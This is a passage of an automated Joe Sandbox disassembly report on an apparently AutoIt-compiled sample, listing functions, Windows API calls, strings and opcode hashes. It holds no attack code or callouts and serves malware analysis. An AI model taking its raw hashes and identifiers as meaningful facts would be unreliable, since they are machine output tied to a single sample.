(, xrefs: 00654BA3
0, xrefs: 00654975
tooltips_class32, xrefs: 00654A96

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 4f4498eb522a019db1a639363975674fd0e66ab0f099dd0386b7a734625ffdbb
Instruction ID: a02dc30fc278cfc52bbaeb1e8c63c60d119c75953f46e3e583d1725b2bfc8861
Opcode Fuzzy Hash: 4f4498eb522a019db1a639363975674fd0e66ab0f099dd0386b7a734625ffdbb
Instruction Fuzzy Hash: 85B1BE70608341AFDB04DF68C849B6ABBE6FF84305F00895DF9999B2A1DB70EC49CB55

Function 0063449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 006344AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006344D2
_wcscpy.LIBCMT ref: 00634500
_wcscmp.LIBCMT ref: 0063450B
_wcscat.LIBCMT ref: 00634521
_wcsstr.LIBCMT ref: 0063452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00634548
_wcscat.LIBCMT ref: 00634591
_wcscat.LIBCMT ref: 00634598
_wcsncpy.LIBCMT ref: 006345C3

Strings

04090000, xrefs: 0063457E
DefaultLangCodepage, xrefs: 006345AB
StringFileInfo\, xrefs: 0063451B
%u.%u.%u.%u, xrefs: 00634626
\VarFileInfo\Translation, xrefs: 00634540

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: bd0aa59afee5823bca8cb2ae298e3fb9872d2037bfe6d8eabc708f68a13ac38b
Instruction ID: 542b462705090b3d21455e17db8de70e9cdfbb8111579250cdd6e36337a63b9b
Opcode Fuzzy Hash: bd0aa59afee5823bca8cb2ae298e3fb9872d2037bfe6d8eabc708f68a13ac38b
Instruction Fuzzy Hash: A641E7719402067BDB10BB749C4BEFF7B6DEF85710F040166FA04E7182EF38AA0186A5

Function 005D27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005D28BC
GetSystemMetrics.USER32(00000007), ref: 005D28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005D28EF
GetSystemMetrics.USER32(00000008), ref: 005D28F7
GetSystemMetrics.USER32(00000004), ref: 005D291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005D2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005D2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005D297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005D2990
GetClientRect.USER32(00000000,000000FF), ref: 005D29AE
GetStockObject.GDI32(00000011), ref: 005D29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 005D29D5

Part of subcall function 005D2344: GetCursorPos.USER32(?), ref: 005D2357
Part of subcall function 005D2344: ScreenToClient.USER32(006957B0,?), ref: 005D2374
Part of subcall function 005D2344: GetAsyncKeyState.USER32(00000001), ref: 005D2399
Part of subcall function 005D2344: GetAsyncKeyState.USER32(00000002), ref: 005D23A7

SetTimer.USER32(00000000,00000000,00000028,005D1256), ref: 005D29FC

Strings

AutoIt v3 GUI, xrefs: 005D2974

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 094ff51a0ca1240cd373ad0e74f8551eec1f260874a8570684c5b535c52d8d5b
Instruction ID: 91c6fa65d8c5eb2726d431e844f6d39a22aae6730252272465e53fbe67fb20f2
Opcode Fuzzy Hash: 094ff51a0ca1240cd373ad0e74f8551eec1f260874a8570684c5b535c52d8d5b
Instruction Fuzzy Hash: 9CB18E7164020AEFDB25DFA8DC45BAE7BB6FB58311F10422AFA16A73D0DB749841CB50

Function 0065C5FE Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

DragQueryPoint.SHELL32(?,?), ref: 0065C627

Part of subcall function 0065AB37: ClientToScreen.USER32(?,?), ref: 0065AB60
Part of subcall function 0065AB37: GetWindowRect.USER32(?,?), ref: 0065ABD6
Part of subcall function 0065AB37: PtInRect.USER32(?,?,0065C014), ref: 0065ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0065C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0065C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0065C6BE
_wcscat.LIBCMT ref: 0065C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0065C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0065C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0065C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0065C757
DragFinish.SHELL32(?), ref: 0065C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0065C851

Strings

P[, xrefs: 0065C65D, 0065C6CA
@GUI_DRAGFILE, xrefs: 0065C800
@GUI_DRAGID, xrefs: 0065C7C9
pbi, xrefs: 0065C79B
@GUI_DROPID, xrefs: 0065C77E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$P[$pbi
API String ID: 169749273-2758620405
Opcode ID: 3e54ce36c6aa5351bf92e64ebe54e8017b7a2954bf791abe3cf1914ce5b4909e
Instruction ID: 6096be5e93ae7608f2262d173eb841fd0663a035df81ef972234afffa7c7b361
Opcode Fuzzy Hash: 3e54ce36c6aa5351bf92e64ebe54e8017b7a2954bf791abe3cf1914ce5b4909e
Instruction Fuzzy Hash: 77613A71108301AFC711EF64CC89DABBFEAFF89751F00092EF595962A1DB709A49CB52

Function 0062A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0062A47A
__swprintf.LIBCMT ref: 0062A51B
_wcscmp.LIBCMT ref: 0062A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0062A583
_wcscmp.LIBCMT ref: 0062A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0062A5F6
GetDlgCtrlID.USER32(?), ref: 0062A648
GetWindowRect.USER32(?,?), ref: 0062A67E
GetParent.USER32(?), ref: 0062A69C
ScreenToClient.USER32(00000000), ref: 0062A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0062A71D
_wcscmp.LIBCMT ref: 0062A731
GetWindowTextW.USER32(?,?,00000400), ref: 0062A757
_wcscmp.LIBCMT ref: 0062A76B

Part of subcall function 005F362C: _iswctype.LIBCMT ref: 005F3634

Strings

%s%u, xrefs: 0062A515

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: dea6f59d8eb6d6eccc0905d13af6a21afd4f1f58056e48d3542642bf449aed2e
Instruction ID: cc381a8079a815d7b26ff5adc3ec18bc23a92242dd8d4e0c8dafc4208be8f6b8
Opcode Fuzzy Hash: dea6f59d8eb6d6eccc0905d13af6a21afd4f1f58056e48d3542642bf449aed2e
Instruction Fuzzy Hash: 12A1E371204B16AFD714DFA0D888BEAB7EAFF44300F008529F999D6290DB70E945CF92

Function 0062AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0062AF18
_wcscmp.LIBCMT ref: 0062AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0062AF51
CharUpperBuffW.USER32(?,00000000), ref: 0062AF6E
_wcscmp.LIBCMT ref: 0062AF8C
_wcsstr.LIBCMT ref: 0062AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0062AFD5
_wcscmp.LIBCMT ref: 0062AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0062B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0062B055
_wcscmp.LIBCMT ref: 0062B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0062B08D
GetWindowRect.USER32(00000004,?), ref: 0062B0F6

Strings

@, xrefs: 0062AEF9
ThumbnailClass, xrefs: 0062AFE0, 0062B060

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 911e4bd515c5cfd1a210b09d2fddfa6cdf0b5dea3cc4381bff430f1eef28c809
Instruction ID: 0fec8bed720dc1fa88d7ccf5babe31de99f323960862f3fe49eac7e9728be707
Opcode Fuzzy Hash: 911e4bd515c5cfd1a210b09d2fddfa6cdf0b5dea3cc4381bff430f1eef28c809
Instruction Fuzzy Hash: 6681017100871A9BDB01DF10E988FAA7BEAFF84314F04906AFD858A191DB74DD45CF61

Function 0065A1B9 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0065A259
DestroyWindow.USER32(?,?), ref: 0065A2D3

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0065A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0065A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0065A382
DestroyWindow.USER32(00000000), ref: 0065A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,005D0000,00000000), ref: 0065A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0065A3F4
GetDesktopWindow.USER32 ref: 0065A40D
GetWindowRect.USER32(00000000), ref: 0065A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0065A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0065A444

Part of subcall function 005D25DB: GetWindowLongW.USER32(?,000000EB), ref: 005D25EC

Strings

P[, xrefs: 0065A1F4, 0065A2B7, 0065A2D9, 0065A2EC
tooltips_class32, xrefs: 0065A346, 0065A3D4
0, xrefs: 0065A26F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$P[$tooltips_class32
API String ID: 1297703922-2614608548
Opcode ID: f0cf447af01a50b724cf46e7fc3011d022eb334d1517ed751ff92c5f4e9a23b2
Instruction ID: 78bc471eccdac23967a1c6cb468462a5d55436ed9f1b6ea11d47b6915012db05
Opcode Fuzzy Hash: f0cf447af01a50b724cf46e7fc3011d022eb334d1517ed751ff92c5f4e9a23b2
Instruction Fuzzy Hash: 7A716B70140205AFD725DF68CC49FAA7BEAFB89705F04462EF986873A0D771E906CB52

Function 0062ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0062AC33

Strings

LAST, xrefs: 0062ABF8
ALL, xrefs: 0062ACC7
[ALL, xrefs: 0062ACD9
REGEXP=, xrefs: 0062AC48
HANDLE=, xrefs: 0062AC2C
ACTIVE, xrefs: 0062AC0E
CLASSNAME=, xrefs: 0062AC70
[ACTIVE, xrefs: 0062AC20
[HANDLE:, xrefs: 0062AC3F
[LAST, xrefs: 0062ACE0
[REGEXPTITLE:, xrefs: 0062AC5B
[CLASS:, xrefs: 0062AC83

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 5cc4cd55209fbd8f48fe505bd33a6402da143eeecef3548d1dfe44b747329f3c
Instruction ID: 2677b21b993a8174b009cf8d7d05c2ea57228da9ea103b1e5cc9dc4547a4afe7
Opcode Fuzzy Hash: 5cc4cd55209fbd8f48fe505bd33a6402da143eeecef3548d1dfe44b747329f3c
Instruction Fuzzy Hash: 5931A57064861AA7D714FA94EE47EFE7B66AF50750F30051BB401712D1FB619F04CA52

Function 00644FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00645013
LoadCursorW.USER32(00000000,00007F00), ref: 0064501E
LoadCursorW.USER32(00000000,00007F03), ref: 00645029
LoadCursorW.USER32(00000000,00007F8B), ref: 00645034
LoadCursorW.USER32(00000000,00007F01), ref: 0064503F
LoadCursorW.USER32(00000000,00007F81), ref: 0064504A
LoadCursorW.USER32(00000000,00007F88), ref: 00645055
LoadCursorW.USER32(00000000,00007F80), ref: 00645060
LoadCursorW.USER32(00000000,00007F86), ref: 0064506B
LoadCursorW.USER32(00000000,00007F83), ref: 00645076
LoadCursorW.USER32(00000000,00007F85), ref: 00645081
LoadCursorW.USER32(00000000,00007F82), ref: 0064508C
LoadCursorW.USER32(00000000,00007F84), ref: 00645097
LoadCursorW.USER32(00000000,00007F04), ref: 006450A2
LoadCursorW.USER32(00000000,00007F02), ref: 006450AD
LoadCursorW.USER32(00000000,00007F89), ref: 006450B8
GetCursorInfo.USER32(?), ref: 006450C8

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 74396fda64b01ec1671891324ee2a1b840d37cdff93848667f3e3ac5a804fe06
Instruction ID: eb23bd1b88572c1ce5b292481379286509dde8fbe327a6778b9d7d02d7f6dd62
Opcode Fuzzy Hash: 74396fda64b01ec1671891324ee2a1b840d37cdff93848667f3e3ac5a804fe06
Instruction Fuzzy Hash: B631F4B1D4831A6BDF109FB68C8999FBFE9FF08750F50452AA50DE7281DA7865008F91

Function 00654392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00654424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0065446F

Strings

GETTOTALCOUNT, xrefs: 00654456
UNCHECK, xrefs: 0065464B
EXISTS, xrefs: 006544D8
ISCHECKED, xrefs: 006545F2
CHECK, xrefs: 0065448F
GETTEXT, xrefs: 006545C2
SELECT, xrefs: 00654620
GETSELECTED, xrefs: 0065457F
EXPAND, xrefs: 00654521
GETITEMCOUNT, xrefs: 00654551
COLLAPSE, xrefs: 006544B5

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 731e3fa14846d499c4b48c58b6a8ce8c4c5c093ceb22dcdba858750025df047c
Instruction ID: 634ac22e092347265739aadd2359ca6c88df32c4873056891a5be397f6781ae2
Opcode Fuzzy Hash: 731e3fa14846d499c4b48c58b6a8ce8c4c5c093ceb22dcdba858750025df047c
Instruction Fuzzy Hash: BC918C702047129BCB14EF14C455A6EBBE2BF95754F0448AEFC925B3A2DB30ED4ACB91

Function 0065C1AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0065C1FC
GetFocus.USER32 ref: 0065C20C
GetDlgCtrlID.USER32(00000000), ref: 0065C217
_memset.LIBCMT ref: 0065C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0065C36D
GetMenuItemCount.USER32(?), ref: 0065C38D
GetMenuItemID.USER32(?,00000000), ref: 0065C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0065C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0065C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0065C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0065C489

Strings

0, xrefs: 0065C33A
P[, xrefs: 0065C2F2, 0065C318

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0$P[
API String ID: 1296962147-4179529919
Opcode ID: 1d2bd7a4b5af1e499d74c924b1d86980714c02ae0d36dee105a884e2076a0fca
Instruction ID: 810710795ec4b38d94e11b0e0fd1e698fedb26e2331d2eb62de1981fc48666a2
Opcode Fuzzy Hash: 1d2bd7a4b5af1e499d74c924b1d86980714c02ae0d36dee105a884e2076a0fca
Instruction Fuzzy Hash: 28819B702083059FDB11DF14C894EABBBEAFB88725F00492EFD9597291D770D909CBA2

Function 0065B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0065B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006591C2), ref: 0065B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0065B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0065B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0065B9C3
FreeLibrary.KERNEL32(?), ref: 0065B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0065B9DF
DestroyIcon.USER32(?,?,?,?,?,006591C2), ref: 0065B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0065BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0065BA17

Part of subcall function 005F2EFD: __wcsicmp_l.LIBCMT ref: 005F2F86

Strings

.dll, xrefs: 0065B86D
.icl, xrefs: 0065B82A
.exe, xrefs: 0065B84A

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 5a3d054780d999a3f2841031ff65ee47b0deb298dcf1cc9d8deb3d9efe52db79
Instruction ID: 78405971ddd81ebd99d701c9f3a0637b4978d2310c27e5c3a86f137a1a4328ed
Opcode Fuzzy Hash: 5a3d054780d999a3f2841031ff65ee47b0deb298dcf1cc9d8deb3d9efe52db79
Instruction Fuzzy Hash: FC61EDB1900209BAEB14DF64DC46BBE7BA9FB09712F104116FE15D62C0DB749984DBA0

Function 005D201B Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 005D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005D2036,?,00000000,?,?,?,?,005D16CB,00000000,?), ref: 005D1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005D20D3
KillTimer.USER32(-00000001,?,?,?,?,005D16CB,00000000,?,?,005D1AE2,?,?), ref: 005D216E
DestroyAcceleratorTable.USER32(00000000), ref: 0060BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005D16CB,00000000,?,?,005D1AE2,?,?), ref: 0060BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005D16CB,00000000,?,?,005D1AE2,?,?), ref: 0060BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005D16CB,00000000,?,?,005D1AE2,?,?), ref: 0060BD0A
DeleteObject.GDI32(00000000), ref: 0060BD1C

Strings

P[, xrefs: 005D2054

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

